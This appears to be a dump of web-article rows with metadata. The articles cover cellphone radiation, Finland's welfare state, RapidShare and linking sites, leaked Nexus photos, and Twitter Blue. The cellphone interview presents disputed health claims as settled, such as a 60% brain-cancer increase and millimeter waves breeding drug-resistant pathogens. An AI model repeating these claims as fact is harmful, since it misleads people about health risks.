Some scientists have said that these findings are without basis and that there isn’t enough evidence that cellphone radiation is harmful to our health. How do you respond to that? **Joel Moskowitz:** Well, first of all, few scientists in this country can speak knowledgeably about the health effects of wireless technology. So, I’m not surprised that people are skeptical, but that doesn’t mean the findings aren’t valid. A big reason there isn’t more research about the health risks of radiofrequency radiation exposure is because the U.S. government stopped funding this research in the 1990s, with the exception of a $30 million rodent study published in 2018 by the National Institute of Environmental Health Sciences’ National Toxicology Program, which found “clear evidence” of carcinogenicity from cellphone radiation. In 1996, the Federal Communications Commission, or FCC, adopted exposure guidelines that limited the intensity of exposure to radiofrequency radiation. These guidelines were designed to prevent significant heating of tissue from short-term exposure to radiofrequency radiation, not to protect us from the effects of long-term exposure to low levels of modulated, or pulsed, radiofrequency radiation, which is produced by cellphones, cordless phones and other wireless devices, including Wi-Fi. Yet, the preponderance of research published since 1990 finds adverse biologic and health effects from long-term exposure to radiofrequency radiation, including DNA damage. More than 250 scientists, who have published over 2,000 papers and letters in professional journals on the biologic and health effects of non-ionizing electromagnetic fields produced by wireless devices, including cellphones, have signed the International EMF Scientist Appeal, which calls for health warnings and stronger exposure limits. So, there are many scientists who agree that this radiation is harmful to our health. 
### I first heard you speak about the health risks of cellphone radiation at Berkeley in 2019, but you’ve been doing this research since 2009. What led you to pursue this research? I got into this field by accident, actually. During the past 40 years, the bulk of my research has been focused on tobacco-related disease prevention. I first became interested in cellphone radiation in 2008, when Dr. Seung-Kwon Myung, a physician scientist with the National Cancer Center of South Korea, came to spend a year at the Center for Family and Community Health. He was involved in our smoking cessation projects, and we worked with him and his colleagues on two reviews of the literature, one of which addressed the tumor risk from cellphone use. At that time, I was skeptical that cellphone radiation could be harmful. However, since I was dubious that cellphone radiation could cause cancer, I immersed myself in the literature regarding the biological effects of low-intensity microwave radiation, emitted by cellphones and other wireless devices. After reading many animal toxicology studies that found that this radiation could increase oxidative stress — free radicals, stress proteins and DNA damage — I became increasingly convinced that what we were observing in our review of human studies was indeed a real risk. ### While Myung and his colleagues were visiting the Center for Family and Community Health, you reviewed case-control studies examining the association between mobile phone use and tumor risk. What did you find? Our 2009 review, published in the *Journal of Clinical Oncology*, found that heavy cellphone use was associated with increased brain cancer incidence, especially in studies that used higher quality methods and studies that had no telecommunications industry funding. 
Last year, we updated our review, published in the *International Journal of Environmental Research and Public Health*, based on a meta-analysis of 46 case-control studies — twice as many studies as we used for our 2009 review — and obtained similar findings. Our main takeaway from the current review is that approximately 1,000 hours of lifetime cellphone use, or about 17 minutes per day over a 10-year period, is associated with a statistically significant 60% increase in brain cancer.

### Why did the government stop funding this kind of research?

The telecommunications industry has almost complete control of the FCC, according to *Captured Agency*, a monograph written by journalist Norm Alster during his 2014-15 fellowship at Harvard University’s Center for Ethics. There’s a revolving door between the membership of the FCC and high-level people within the telecom industry that’s been going on for a couple of decades now.

The industry spends about $100 million a year lobbying Congress. The CTIA, which is the major telecom lobbying group, spends $12.5 million per year on 70 lobbyists. According to one of their spokespersons, lobbyists meet roughly 500 times a year with the FCC to lobby on various issues. The industry as a whole spends $132 million a year on lobbying and provides $18 million in political contributions to members of Congress and others at the federal level.

### The telecom industry’s influence over the FCC, as you describe, reminds me of the tobacco industry and the advertising power it had in downplaying the risks of smoking cigarettes.

Yes, there are strong parallels between what the telecom industry has done and what the tobacco industry has done, in terms of marketing and controlling messaging to the public. In the 1940s, tobacco companies hired doctors and dentists to endorse their products to reduce public health concerns about smoking risks.
The CTIA currently uses a nuclear physicist from academia to assure policymakers that microwave radiation is safe. The telecom industry not only uses the tobacco industry playbook, it is more economically and politically powerful than Big Tobacco ever was. This year, the telecom industry will spend over $18 billion advertising cellular technology worldwide.

### You mentioned that cellphones and other wireless devices use modulated, or pulsed, radiofrequency radiation. Can you explain how cellphones and other wireless devices work, and how the radiation they emit is different from radiation from other household appliances, like a microwave?

Basically, when you make a call, you’ve got a radio and a transmitter. It transmits a signal to the nearest cell tower. Each cell tower has a geographic cell, so to speak, in which it can communicate with cellphones within that geographic region or cell. Then, that cell tower communicates with a switching station, which then searches for whom you’re trying to call, and it connects through a copper cable or fiber optics or, in many cases, a wireless connection through microwave radiation with the wireless access point. Then, that access point either communicates directly through copper wires through a landline or, if you’re calling another cellphone, it will send a signal to a cell tower within the cell of the receiver and so forth.

The difference is the kind of microwave radiation each device emits. With regard to cellphones and Wi-Fi and Bluetooth, there is an information-gathering component. The waves are modulated and pulsed in a very different manner than your microwave oven.

### What, specifically, are some of the health effects associated with long-term exposure to low-level modulated radiofrequency radiation emitted from wireless devices?
Many biologists and electromagnetic field scientists believe the modulation of wireless devices makes the energy more biologically active, which interferes with our cellular mechanisms, opening up calcium channels, for example, and allowing calcium to flow into the cell and into the mitochondria within the cell, interfering with our natural cellular processes and leading to the creation of stress proteins and free radicals and, possibly, DNA damage. And, in other cases, it may lead to cell death.

In 2001, based upon the biologic and human epidemiologic research, low-frequency fields were classified as “possibly carcinogenic” by the International Agency for Research on Cancer (IARC) of the World Health Organization. In 2011, the IARC classified radiofrequency radiation as “possibly carcinogenic to humans,” based upon studies of cellphone radiation and brain tumor risk in humans. Currently, we have considerably more evidence that would warrant a stronger classification. Most recently, on March 1, 2021, a report was released by the former director of the National Center for Environmental Health at the Centers for Disease Control and Prevention, which concluded that there is a “high probability” that radiofrequency radiation emitted by cellphones causes gliomas and acoustic neuromas, two types of brain tumors.

### Let’s talk about the fifth generation of cellphone technology, known as 5G, which is already available in limited areas across the U.S. What does this mean for cellphone users and what changes will come with it?

For the first time, in addition to microwaves, this technology will employ millimeter waves, which are much higher frequency than the microwaves used by 3G and 4G. Millimeter waves can’t travel very far, and they’re blocked by fog or rain, trees and building materials, so the industry estimates that it’ll need 800,000 new cell antenna sites.
Each of these sites may have cell antennas from various cellphone providers, and each of these antennas may have microarrays consisting of dozens or even perhaps hundreds of little antennas. In the next few years in the U.S., we will see deployed roughly 2.5 times more antenna sites than in current use unless wireless safety advocates and their representatives in Congress or the judicial system put a halt to this.

### How are millimeter waves different from microwaves, in terms of how they affect our bodies and the environment?

Millimeter wave radiation is largely absorbed in the skin, the sweat glands, the peripheral nerves, the eyes and the testes, based upon the body of research that’s been done on millimeter waves. In addition, this radiation may cause hypersensitivity and biochemical alterations in the immune and circulatory systems — the heart, the liver, kidneys and brain. Millimeter waves can also harm insects and promote the growth of drug-resistant pathogens, so it’s likely to have some widespread environmental effects for the microenvironments around these cell antenna sites.

### What are some simple things that each of us can do to reduce the risk of harm from radiation from cellphones and other wireless devices?

First, minimize your use of cellphones or cordless phones — use a landline whenever possible. If you do use a cellphone, turn off the Wi-Fi and Bluetooth if you’re not using them. However, when near a Wi-Fi router, you would be better off using your cellphone on Wi-Fi and turning off the cellular because this will likely result in less radiation exposure than using the cellular network.

Second, distance is your friend. Keeping your cellphone 10 inches away from your body, as compared to one-tenth of an inch, results in a 10,000-fold reduction in exposure. So, keep your phone away from your head and body. Store your phone in a purse or backpack. If you have to put it in your pocket, put it on airplane mode.
Text, use wired headphones or speakerphone for calls. Don’t sleep with it next to your head — turn it off or put it in another room.

Third, use your phone only when the signal is strong. Cellphones are programmed to increase radiation when the signal is poor, that is when one or two bars are displayed on your phone. For example, don’t use your phone in an elevator or in a car, as metal structures interfere with the signal.

Also, I encourage people to learn more about the 150-plus local groups affiliated with Americans for Responsible Technology, which are working to educate policymakers, urging them to adopt cell tower regulations and exposure limits that fully protect us and the environment from the harm caused by wireless radiation.

*For safety tips on how to reduce exposure to wireless radiation from the California Department of Public Health and other organizations, Moskowitz recommends readers visit his website, saferemr.com, Physicians for Safe Technology and the Environmental Health Trust.*
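The "10,000-fold reduction" figure quoted in the interview follows from the inverse-square law for a point source of radiation. A minimal sketch of that arithmetic (the helper function and its name are ours, and the ideal point-source falloff is a simplification; real near-field exposure from a phone is more complex):

```python
def relative_exposure(near_inches: float, far_inches: float) -> float:
    """Ratio of exposure at `near_inches` vs. `far_inches` from the source,
    assuming ideal inverse-square falloff: intensity ~ 1 / distance^2."""
    return (far_inches / near_inches) ** 2

# One-tenth of an inch vs. 10 inches is a 100x increase in distance,
# so exposure drops by a factor of 100^2 = 10,000.
factor = relative_exposure(0.1, 10)
print(factor)  # 10000.0
```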
true
true
true
The telecommunications industry insists cellphone technology is safe. But the director of UC Berkeley’s Center for Family and Community Health is determined to prove it wrong.
2024-10-12 00:00:00
2021-07-01 00:00:00
https://news.berkeley.ed…ll-phone-750.jpg
article
berkeley.edu
Berkeley News
null
null
6,042,195
http://www.theatlantic.com/international/archive/2013/07/the-secret-to-finlands-success-with-schools-moms-kids-and-everything/277699/
The Secret to Finland's Success With Schools, Moms, Kids—and Everything
Olga Khazan
# The Secret to Finland's Success With Schools, Moms, Kids—and Everything

The country has cheaper medical care, smarter children, happier moms, better working conditions, less-anxious unemployed people, and lower student loan rates than we do. And that probably will never change.

It's hard not to get jealous when I talk to my extended family. My cousin's husband gets 36 vacation days per year, not including holidays. If he wants, he can leave his job for a brief hiatus and come back to a guaranteed position months later. Tuition at his daughter's university is free, though she took out a small loan for living expenses. Its interest rate is 1 percent. My cousin is a recent immigrant, and while she was learning the language and training for jobs, the state gave her 700 euros a month to live on. They had another kid six years ago, and though they both work, they'll collect 100 euros a month from the government until the day she turns 17.

They of course live in Finland, home to saunas, quirky metal bands, and people who have for decades opted for equality and security over keeping more of their paychecks. Inarguably one of the world's most generous -- and successful -- welfare states, the country has a lower infant mortality rate, better school scores, and a far lower poverty rate than the United States, and it's the second-happiest country on earth (the U.S. doesn't break the top 10). According to the OECD, Finns on average give an 8.8 score to their overall life satisfaction. Americans are at 7.5.

Sometimes when I'm watching the web traffic for stories here at *The Atlantic*'s global desk, I'll notice a surge in readership in one of a couple of archival stories we have about how fantastic Finland is -- usually thanks to Reddit or a link from another news site. One is about Finland's "baby boxes," a sort of baby shower the Finnish government throws every mom.
A package sent to expecting women contains all the essentials for newborns -- everything from diapers to a tiny sleeping bag. (Want to choose your own baby clothes? You can opt instead for the box's cash value, as my cousin did.) The other popular story is about Finland's school system, which ranks as one of the world's best -- with no standardized testing or South Asian-style "cramming" but with lots of customization in the classroom. Oh, and students there also spend fewer hours physically in school than their counterparts in other Western countries.

As the U.S. raises student loan rates, considers cutting food stamps, guts long-term unemployment insurance, and strains to set up its first-ever universal healthcare system, it's easy to get sucked into articles about a country that has lapped America in certain international metrics but has also kept social protections in place. Like doting parents trying to spur an underperforming child, American liberals seem to periodically ask, "Why can't you be more like your brother?"

It's a good debate to have, and in some ways, it seems like there's no reason why the U.S. shouldn't borrow from Finland or any other Nordic country -- we're richer and just as committed to improving education and health, after all. Here's the difference: Finland's welfare system was hardwired into its economic development strategy, and it hasn't been seriously challenged by any major political group since. And just as Finland was ramping up its protections for workers, families, and the poor in the 1960s, Americans began to sour on the idea of "welfare" altogether. What's more, some economists argue that it's *because* of all that American capitalism contributes to the global economy that countries like Finland -- kinder, gentler, but still wealthy -- can afford to pamper their citizens. With actual Pampers, no less.

***

Let's start with mandatory maternity leave, a favorite topic among the having-it-all, Leaning-In crowd.
The U.S. is one of the last countries on earth without it, but the Finnish state mandates four months of paid maternity leave, and on top of that, the mother and father can share an additional six-month "parental leave" period, with pay. After that, kids can either continue staying home with their mothers until they reach school age, or parents can instead send them to a publicly subsidized child-care center, where the providers are all extensively trained. The cost is on a sliding scale based on family income, but the *maximum* comes out to about $4,000 a year, compared with $10,000 for comparable care in the U.S. This is just one of the many reasons Finland is "the best place to be a mom," as the nonprofit Save the Children declared in May.

Can't get a job? Not to worry. Unemployment insurance in Finland lasts for 500 days, after which you can collect a means-tested Labor Market Subsidy for an essentially indefinite period of time. (The unemployment rate is a high-but-not-awful 8.2 percent.)

At this point, if you've literally turned green with envy and need to see a doctor, you're in luck! In addition to dirt-cheap universal healthcare, Finland offers compensation for wages you might have lost while you were away from work, as well as a "Special Care Allowance" if you need to take some time off to take care of your sick kids. All of this adds up to the stress equivalent of living in what is essentially a vast, reindeer-fur-lined yoga studio.

"It seems to me that people in Finland are more secure and less anxious than Americans because there is a threshold below which they won't fall," said Linda Cook, a political scientist at Brown University who has studied European welfare states. "Even if they face unemployment or illness, Finns will have some payments from the state, public health care and education."

***

The Finns didn't always have it this good.
For much of the early 20th century, Finland was agrarian and underdeveloped, with a GDP per capita trailing other Nordic countries by 30 to 40 percent in 1900. One advantage Finland did have, however, was enlightened policies towards gender. The country focused on beefing up child and maternal care in large part because women were at the core of Finland's independence and nation-building efforts at the turn of the 20th century. Finnish women were the second in the world to get the vote in 1906, and they were heavily represented in the country's first parliament.

Ellen Marakowitz, a lecturer at Columbia University who studies Finland, argues that because women helped form modern Finland, things like maternity leave and child benefits naturally shaped its welfare structure decades later. "You have a state system that was built on issues concerning Finnish citizens, both men and women, rather than women's rights," she said. "Government was created in this equal footing for men and women."

Finland's strong trade unions pioneered its initial worker protections, but the state soon took those functions over. Today, roughly 75 to 80 percent of Finns are union members (it's about 11 percent in the U.S.), and the groups dictate the salaries and working conditions for large swaths of the population.

And as the country worked to industrialize in the 1960s, its economic policymakers took on a mentality similar to that of CEOs at tech companies with awesome employee perks like free string cheese and massages. "The thinking was, 'for a country of 5 million, we don't have many resources to waste. If people are happy, they'll maximize their work ethic, and we can develop,'" says Andrew Nestingen, a professor who leads the Finnish studies program at the University of Washington. The theory of the welfare state was that "everyone should get a slice of the cake so that they have what they need to realize their life projects."
The country's unemployment and disability system was in place by 1940, and subsequent decades saw the expansion of child benefits and health insurance. Meanwhile, thanks to the country's strong agrarian tradition, the party that represents the rural part of Finland pushed through subsidies for stay-at-home (or stay-on-farm, in their case) mothers -- thus the current smorgasbord of inexpensive child-care options.

Over time, Finland was able to create its "cake" -- and give everyone a slice -- in large part because its investments in human capital and education paid off. In a sense, welfare *worked* for Finland, and they've never looked back. "In the Finnish case, this has really been a part of our success story when it comes to economic growth and prosperity," said Susanna Fellman, a Finn who is now a professor of economic history at the University of Gothenburg in Sweden. "The free daycare and health-care has made it possible for two breadwinners -- women can make careers even if they have children. This is also something that promotes growth."

With this setup, Finns have incredible equality and very little poverty -- but they don't get to buy as much stuff. The OECD gives the U.S. a 10 when it comes to household income, the highest score, while Finland gets a measly 3.5. And there are some major lifestyle differences: Finns live in houses and apartments that are about half the size of Americans', and their taxes on the wealthy, like those on capital gains, are much higher than ours. (Hence why taxes make up a huge chunk of their GDP.) Professionals such as doctors make far less there, which helps medical care to stay reasonably priced.
(The conservative Heritage Foundation ranks Finland as downright "repressed" in some categories, like government spending, on its "Index of Economic Freedom.")

It's also worth noting that Finland isn't a total economic Wonderland, either: It's not growing very fast and will probably have issues with its aging population in coming years. The Bank of Finland recently predicted that the country might soon exceed the 60 percent debt-to-GDP ratio mandated by the European Union -- a common problem in Europe these days. Some of Finland's more conservative politicians have suggested cutting public benefits there in the wake of the economic downturn -- but even with those cuts, social protections there would still be far more generous than ours.

And the economic redistribution there doesn't always work perfectly. Some municipalities inevitably find themselves with lower-quality hospitals and day cares, even when they're supposed to be roughly identical, and recently some pro-business groups have tried to edge the country toward greater privatization (though unions have pushed back). Still, the country's small, well-educated population and investments in technology have allowed it to avoid some of the problems currently plaguing other, similarly socialist European countries.

Overall, most Finns love the welfare system that loves them back. I asked my cousin's husband, Reijo, why he was willing to support such an arrangement even though he works full time. "Money isn't everything. We value equality, not inequality," he said. Fair enough. But does he have any gripes about the Finnish way? Anything he would change? Perhaps kick some of those freeloaders off their indefinite unemployment? No, he said, but he did point to one small issue: "I think that for university students it is not yet good enough. Many students have to work while they are studying."

***

Like Finland, the U.S. also set up massive safety-net programs, in the form of Medicare and Medicaid, in the 1960s.
But paradoxically, many Americans began developing a deep aversion to government handouts at the same time. The 1960s saw a rise in poverty and children born out of wedlock, particularly in urban communities. Sensational media stories about families "abusing" welfare -- especially when the putative abusers were portrayed as African-American -- helped cement opposition to public assistance. One study found that in the early 1970s, nearly three-quarters of magazine stories about welfare or poverty featured images of African-Americans, even though African Americans comprised only about a third of welfare recipients.

"I do think that racial divisions are an important factor here -- the sense among many people that universal benefits will take from 'us' and give to 'them' -- to a part of society that is seen as different, less deserving, imagined as racially different," Cook, from Brown University, said. "I think that many middle-class Americans favor social benefits for what they see as 'deserving' people who have worked and earned them -- so Medicare is good -- but universal health care would provide benefits for people who are imagined as not deserving."

In a 1976 speech, Ronald Reagan made mention of supposed "welfare queens" who make six-figure salaries while drawing government funds, stoking a sense of outrage over perceived waste in public assistance. (It was later shown that he used an exaggerated anecdote.) Arguing that social insurance disincentivized work, and prioritizing markets and individual liberty, the growing new conservative movement eventually joined together businesses and working-class voters in pushing for cuts in government programs.

Though we seemingly support spending on the sick, poor, and elderly, in 2006, 46 percent of Americans still thought the government spent "too much" on welfare, even 10 years after a total structural overhaul of welfare had passed.
Jefferey Sellers, a University of Southern California political scientist, found another key difference between the two nations: Finland has much more powerful local governments than the U.S., and they're tasked with executing the myriad functions of the welfare system -- from helping the poor to operating the day cares. Municipal taxes are redistributed and supplemented with grants, thus largely eliminating the problem of under-resourced areas. Local public expenditures are 20 percent of GDP in Finland, but just 10 percent in the U.S., he points out. "The national government provides local governments with the financial means, legal powers, and the expertise to perform well," he said. Meanwhile, "Fiscal redistribution among local governments assures equality in how those services are distributed."

What's more, some economists argue that the only way countries like Finland can be so well-off and yet so cushy is because countries like the U.S. create the technology that powers the rest of the world -- with huge rewards for success but few safety nets in the case of failure. "The entire world benefits because of Apple's iPhones," said Daron Acemoglu, an economist at MIT, admitting it was a relatable but not necessarily optimal example (Finland gave us Nokia and Linux's Linus Torvalds, after all). "If the United States did not provide incentives for Apple to come up with and develop the iPhone, then the entire world economy would lose the benefits it obtains from this product. The cutthroat reward structure in the United States is encouraging the creation of many products and technologies like this."

If America were to adopt some of Finland's "cuddly" benefits, the thinking goes, the entire world economy might slow down. For Finns, it would be out with the baby boxes, in with the subsistence farming again.

So what about education reform, then?
Finnish school expert Pasi Sahlberg has written that Finnish schools are based on "improving the teaching force, limiting student testing to a necessary minimum, and placing responsibility and trust before accountability." It's true that Finnish teachers design their own curricula and don't have to deal with test-score-based evaluations, but school officials there are also placing young minds in very well-equipped hands: All teachers have graduate degrees in education and their subject areas of expertise. And schools are funded based on need, so the most struggling schools get the most resources. There is no "Teach for Finland," as Sahlberg has said.

But in some ways, even the Finnish way of educating requires a strong welfare system as a foundation. The country has an extremely low child-poverty rate, which likely makes teaching without testing or score-keeping much easier. And how many American teachers would love to get a master's degree but aren't willing to take on the student loans that come with it? "The easiest [explanation] is to say that Finland seems to be a well-performing system overall, as far as the international rankings are considered," Sahlberg told me. "So, it is no wonder the education system also works well."

The no-testing model also makes sense for a culture that's low on one-upmanship: "I think one of the more important things is that there's less of an emphasis on competition in Finland," Marakowitz said. "Many Finnish children don't know how to read before they go to school, and you need a certain kind of cultural setting for that. Some U.S. parents would be quite freaked out."

***

When Americans hold up Finland as a model, their arguments are usually dismissed with two indisputable facts: Finland is indeed much smaller than the U.S., making it easier to disperse generous benefits on a national scale. It's also far more homogeneous, making disputes over payouts less frequent and less racially charged.
Still, Cook says, the claims of homogeneity are a bit over-stated. Finland has both sizeable Swedish- and Russian-speaking communities, and right-leaning parties like the "True Finns" want to pare back the little immigration the country does have. (Even the True Finns, though, love the welfare state.)

Building on the success of Finland's local governments, individual U.S. states could conceivably be more like mini-Finlands -- just look at Massachusetts, which had a comprehensive health-care system before the rest of the nation. But creating and enforcing 50 separate safety nets would require a level of oversight the U.S. federal government just doesn't have. Even Obamacare was challenged aggressively in court and has faced opposition from some two dozen states.

Fellman described Finland's welfare state as a "virtuous circle" -- Finns' social cohesion props up the welfare state, which in turn promotes greater harmony. But in a way, America's economic competitiveness, focus on innovation, and lack of safety net all reinforce one another, too. The very reason we're so frequently googling what we can learn from "Finland's school success," after all, is that we want to stay one step ahead.
true
true
true
The country has cheaper medical care, smarter children, happier moms, better working conditions, less-anxious unemployed people, and lower student loan rates than we do. And that probably will never change.
2024-10-12 00:00:00
2013-07-11 00:00:00
null
article
theatlantic.com
The Atlantic
null
null
4,409,585
http://torrentfreak.com/rapidshare-wants-a-crackdown-on-linking-sites-120820/
RapidShare Wants A Crackdown on Linking Sites * TorrentFreak
Ernesto Van der Sar
In common with every file-sharing service, RapidShare is used by some of its members to host infringing material. While RapidShare itself has no search engine, there are many third-party websites that facilitate piracy by linking to copyrighted works stored on file-hosting sites. These websites are the real problem, RapidShare believes.

This is one of the messages that RapidShare’s Chief Legal Officer Daniel Raimer is presenting at the Technology Policy Institute forum in Aspen today. Raimer joins a panel on Copyright and Piracy and informs TorrentFreak that he plans to counter the image that file-hosting sites are a problem. Raimer believes it’s important to stress that “legitimate” file-hosting services are merely offering a technology, and are not the ones facilitating piracy.

This is also the point the company made in its advice to the U.S. Government last week. Responding to a public consultation on the future of U.S. IP enforcement, the company emphasized that linking sites are the real problem.

“Rather than enacting legislation that could stifle innovation in the cloud, the U.S. government should crack down on this critical part of the online piracy network,” the company wrote.

“These very sophisticated websites, often featuring advertising, facilitate the mass indiscriminate distribution of copyrighted content on the Internet and should be the focus of US intellectual property enforcement efforts.”

In addition to a crackdown on linking sites, RapidShare also believes that the U.S. Government should continue to push for voluntary industry agreements to counter piracy, instead of writing more legislation. These agreements have already been reached in the advertising business and among payment providers, and file-hosting services should not be overlooked, RapidShare notes.

“[The U.S. should] continue its work to secure voluntary industry agreements to address repeated online piracy and counterfeiting and include cloud storage and file hosting companies in these efforts,” they wrote.

Earlier this year RapidShare published a “responsible practices” document for the file-hosting business, which they believe could be a basis for an industry agreement. While the major music labels said at the time that RapidShare’s suggestions didn’t go far enough, Raimer told TorrentFreak they are the absolute limit for the file-hoster.

Raimer is convinced that when file-hosting companies take their responsibilities seriously, and when law enforcement goes after linking sites, copyright holders should have little left to complain about.
true
true
true
File-hosting service RapidShare admits that the file-hosting business has its challenges, but says that linking sites are the real problem. The company advised the U.S. Government last week that law enforcement should crack down on these websites, instead of writing new legislation that may stifle innovation. To address these piracy concerns, RapidShare's Chief Legal Officer Daniel Raimer is meeting with technology leaders and law enforcement at the Technology Policy Institute forum in Aspen today.
2024-10-12 00:00:00
2012-08-20 00:00:00
null
article
torrentfreak.com
Torrentfreak
null
null
34,038,095
https://www.netfunny.com/rhf/jokes/99/Jun/caution.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
30,273,178
https://www.eetimes.com/introducing-the-string-battery/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
7,629,647
http://filamentgroup.com/lab/picturefill_2_a/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
13,428,441
https://www.scop.io/blog/social-media-marketing-tools
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
4,675,651
http://www.androidpolice.com/2012/10/15/these-photos-may-not-show-a-leaked-sony-nexus-after-all-heres-why/
These Photos May Not Show A Leaked Sony Nexus After All – Here's Why
Liam Spradlin
Earlier today, a couple of rather exciting photos found on Picasa began hitting news sites showing what could be a leaked device called the Sony Nexus X. Of course, during Nexus season, any rumor or glance at a possible new device is always exciting, but sometimes it's worthwhile to take a step back and consider whether what we're looking at is actually what it appears to be. Our penchant for putting leaked images under the microscope led us to do a bit of investigating. After taking a look at the Nexus X photos, we have some doubts about their validity.

First, the photos – below are resaved versions of the originals downloaded from Picasa. To do your own analysis, grab the originals here.

## What's Wrong

One of the first things we noticed about the set was the photo of the front of the device. Many things about it are believable – the system buttons, sensors, camera, and earpiece are all things that should be present. What's odd, however, is that the screen lacks a persistent Google Search bar (found on the purported LG Nexus) and the Play Store icon lacks a label (something that can usually only be achieved using a custom launcher).

These clues prompted me to take a quick look at the EXIF data for each photo (which can again be found at their home on Picasa). Here's a quick overview:

What's interesting here is that the photo on the left was taken at 1:55 PM, while the screen's clock says 6:03. The photo was both shot and uploaded on October 13th, while its counterpart was shot October 14th at 5:47 AM and uploaded that same day at 12:47 PM.

Additionally, the shot of the front appears to be evenly exposed across the entire frame. This would not be entirely odd, except that there is no exposure bias, and it is generally a challenge (even on well-lighted surfaces) to take a good photo of a device with an evenly-exposed display when shooting with a mobile camera (in this case, the Galaxy Nexus).
While the presence of a faint reflection on the screen may lend credence to the authenticity of the shot, if the device this photo is based on was switched off, popping a screenshot on top and changing the screen layer's blend mode could achieve this effect in < 30 seconds. Here's a super quick test image I made to illustrate this: The photo of the back of the device is not without its own worries. My primary concern (other than the well-placed Google logo) is with the microUSB connector. While it wouldn't be surprising to see the microUSB connector on the side of the device, and a connector that caused a slight bump on the back of the device wouldn't be something to bat an eye at, there are a couple of problems. First, the otherwise even highlight running across the corner of the device is interrupted even before getting to the connector. Second, the black level of the adapter itself is completely different from its surrounding sideband. The connector's edges are also curiously cut and sharp. Finally, the disruption in the shadow on the side of the Nexus X is not consistent with the shape of the connector itself. Notice that the highlight created by the supposed bump cuts *inward* as it approaches the connector itself. ## So What Is It? This one isn't so easy. Looking through GSMArena's list of every Sony-made phone in existence, the Xperia Ion comes closest, but the back of the pictured device is quite different. Our best guess for the device these photos are based on is either a design mockup, a prototype, or another variant of the Xperia Ion. The front of the device is nearly identical (the Sony and Xperia logos can be knocked out in less than 2 minutes), and while the back features a strange chin and different textures, it has a common Xperia camera/flash array. While we can't confirm the identity of the photographed device, there appear to be a *few* too many things wrong with the images for this to be the real deal. 
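For the curious, the "screen" blend mode mentioned above has simple per-channel math. This is a generic sketch of the standard formula, not a claim about how these specific images were produced:

```python
def screen_blend(base: int, overlay: int) -> int:
    """Standard 'screen' blend for one 8-bit channel:
    result = 255 - (255 - base) * (255 - overlay) / 255."""
    return 255 - round((255 - base) * (255 - overlay) / 255)

# A black (powered-off) pixel under a bright screenshot pixel comes
# out bright, so the screenshot layer dominates the dark display:
print(screen_blend(0, 200))   # → 200
# Screen blending never darkens; white stays white:
print(screen_blend(255, 40))  # → 255
```

Because screen blending can only lighten, a screenshot layered over a photo of a switched-off display shows through cleanly while faint reflections in the base photo survive, which matches the effect described.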
While something of a let-down, it isn't at all uncommon for leaked images (photographic or otherwise) to lead us astray, and we shouldn't have too long to wait to hear of Google's Nexus plans, if late-October announcement rumors are to be believed.
true
true
true
null
2024-10-12 00:00:00
2012-10-15 00:00:00
https://static1.anpoimag…sae0_image54.png
article
androidpolice.com
Android Police
null
null
35,208,089
https://www.phyl.org/
Never Search Alone
null
***New*:** Phyl Terry on Lenny's Podcast (links for Lenny's audience) – Apple Spotify YouTube a *free* support group of peer job seekers who meet regularly to help each other find jobs they love. more than 2,400 launched! Or, *first* find out more about Job Search Councils. Or, *register* a JSC you set up yourself. “The Never Search Alone experience was a 10!” Why? This free volunteer-driven community has already helped thousands of job seekers. We'd love to help YOU. The best thing we can do is help you join a Job Search Council (JSC). These are mutual support groups made up of peer job seekers who use the *Never Search Alone* methodology to search *together* to find good jobs. "Helped me find the right job for moving my career forward." "This book's step-by-step approach will change your career – and life." Never Search Alone is like a secret unlock to the job marketplace. Get started with your Job Search Council. Join a JSC. What are Job Search Councils? Learn more about JSCs.
true
true
true
Take charge of your career and find a job you love. Join a free Job Search Council
2024-10-12 00:00:00
2023-01-01 00:00:00
https://cdn.prod.website…social-share.jpg
website
null
null
null
null
12,335,563
http://www.recode.net/2016/8/18/12540686/google-uber-self-driving-cars-consumers
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
35,453,502
https://www.hollywoodreporter.com/business/digital/twitter-blue-elon-musk-doge-1235367512/
On Doge Twitter, Everything Is Meaningless
J Clara Chan
The purge siren was more like a whimper. As verified Twitter users braced for the Elon Musk–run social media company to begin removing verification badges en masse over the weekend, the Twitter product team appeared focused on something else entirely: replacing Twitter’s blue bird icon on Monday with that of a Shiba Inu, the dog associated with the Doge meme and cryptocurrency Dogecoin. Doge Twitter is emblematic of Musk’s chaotic and unfocused reign over Twitter, where features are rolled out haphazardly with little to no notice, select organizations like *The New York Times* are punished (i.e., lose their check marks) on a whim based on Musk’s uneven standards and basic site functionality — remember when users couldn’t even tweet? — isn’t a given. Aside from an “as promised” tweet by Elon, the company never even officially acknowledged why it embraced Doge as an icon, leaving it as another random moment in the Musk era. The bloodbath that wasn’t is likely because there is no method for Twitter to remove verification badges en masse, as *The Washington Post* reported. In a since-deleted tweet on April 2, Musk said he would be giving “a few weeks grace” to legacy verified users to sign up for Twitter Blue “unless they tell they won’t pay now, in which we will remove [their verification badges],” which appeared to be the case with *The New York Times*’ main account. (A representative for the *Times* did not respond to requests for comment on whether the outlet has seen a decrease in engagement or reach after losing its verified status.) But as of early this week, most verified users have kept their badges, with many expressing no interest in paying for Twitter Blue, the $8/month subscription service that will verify any user with a phone number and offer other perks like a decrease in ads and a boost in visibility across the platform. 
If anything, a Twitter Blue subscription has become somewhat of a scarlet A on the social platform to some, with some legacy users even begging for their blue checks to be removed and 39,000 users following an account that shares tools on how to weed out and block Twitter Blue subscribers. If Musk was also counting on celebrities and top creators to absorb the $8 monthly fee in exchange for protecting their verified status, he thought wrong. “I am not paying for a blue check. That money could (and will) be going towards my extra hot lattes,” tweeted Dionne Warwick. On the organizational side, major publications like *The New York Times*, *The Washington Post* and *The* *Los Angeles Times* have all said they will not pay the $1,000/month fee to join Twitter’s verified organizations service, which gives business accounts a gold verification badge and adds an affiliate badge (a smaller version of the main account’s profile picture) to its affiliate accounts. If that was confusing to read, that’s because it is: a visual nightmare of badges next to badges, all of which mean next to nothing now. It’s a pay-for-play strategy that has not eked out much success for the cash-strapped company, as roughly 3.6 percent of legacy verified users have signed up for Twitter Blue, according to one estimate from the software developer Travis Brown, who has been tracking changes to users’ verification statuses. (Twitter has not publicly released its number of Twitter Blue subscribers.) And those who have offered to pay tend to have smaller followings on the platform, as some 49.1 percent of Twitter Blue subscribers have fewer than 1,000 followers, based on Brown’s analysis. A separate study from the web analytics firm Similarweb found that of the 2.6 million people who checked out the Twitter Blue sales page on their desktop in 